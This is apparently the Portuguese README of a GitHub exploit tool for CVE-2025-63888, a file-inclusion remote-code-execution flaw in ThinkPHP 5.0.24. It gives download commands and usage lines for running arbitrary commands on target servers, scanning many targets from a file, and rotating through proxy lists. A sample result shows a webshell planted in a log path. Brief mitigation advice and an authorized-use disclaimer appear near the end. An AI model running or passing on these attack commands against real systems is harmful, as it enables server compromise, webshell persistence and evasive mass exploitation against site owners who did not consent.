
Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-63888 (Inclusão de Arquivo RCE no ThinkPHP 5.0.24)
Uma ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-63888 no ThinkPHP 5.0.24, que permite Execução Remota de Código através de ataques de inclusão de arquivos.
Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.
CVE-2025-63888 é uma vulnerabilidade crítica de Execução Remota de Código no ThinkPHP 5.0.24. A vulnerabilidade existe na função read localizada em thinkphp/library/think/template/driver/File.php, permitindo que atacantes executem código arbitrário através de ataques de inclusão de arquivos manipulando o caminho do template na função view().
Pontuação CVSS: 9.8 (Crítica)
Versão Afetada: ThinkPHP 5.0.24 (versão exata)
Arquivo Vulnerável: thinkphp/library/think/template/driver/File.php
Função Vulnerável: Método read()
# Clone o repositório
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit
# Instale as dependências
pip install -r requirements.txt
# Torne o script executável (opcional)
chmod +x cve_2025_63888_exploit.py
# Baixe o script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py
# Instale as dependências
pip install requests
# Alvo único
python3 cve_2025_63888_exploit.py -u http://target.com
# Executar comando personalizado
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"
# Múltiplos alvos a partir de arquivo
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
# Com threading para varredura mais rápida
python3 cve_2025_63888_exploit.py -u http://target.com -t 5
# Saída detalhada para depuração
python3 cve_2025_63888_exploit.py -u http://target.com -v
# Proxy único
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port
# Múltiplos proxies a partir de arquivo
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
-u, --url URL do alvo
-f, --file Arquivo contendo URLs dos alvos (um por linha)
-c, --command Comando a executar (padrão: id)
-t, --threads Número de threads (padrão: 1)
-o, --output Arquivo de saída (padrão: uknf_results.json)
-v, --verbose Ativar log detalhado
--proxy URL do proxy (ex: http://127.0.0.1:8080)
--proxy-list Arquivo contendo URLs de proxy (um por linha)
O script gera um arquivo JSON com resultados detalhados:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:05:35.763409",
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/index.php/index/index/view",
"webshell_created": true,
"webshell_path": "../../../runtime/log/2025/11/18.log"
}
view()Se você está usando ThinkPHP 5.0.24:
Atualize imediatamente:
Implemente validação de caminho:
view()../, ..)Correções em nível de código:
realpath() para garantir que os arquivos estejam dentro de diretórios permitidospython3 cve_2025_63888_exploit.py -u https://example.com
# Crie o arquivo de alvos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Execute a varredura
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"
# Proxy único
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Múltiplos proxies a partir de arquivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.
git checkout -b feature/AmazingFeature)git commit -m 'Adiciona alguma AmazingFeature')git push origin feature/AmazingFeature)Se você encontrar algum problema ou tiver sugestões, por favor abra uma issue no GitHub.
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.
Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este programa. Os usuários são responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema.
Se você achar esta ferramenta útil e quiser apoiar o projeto:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7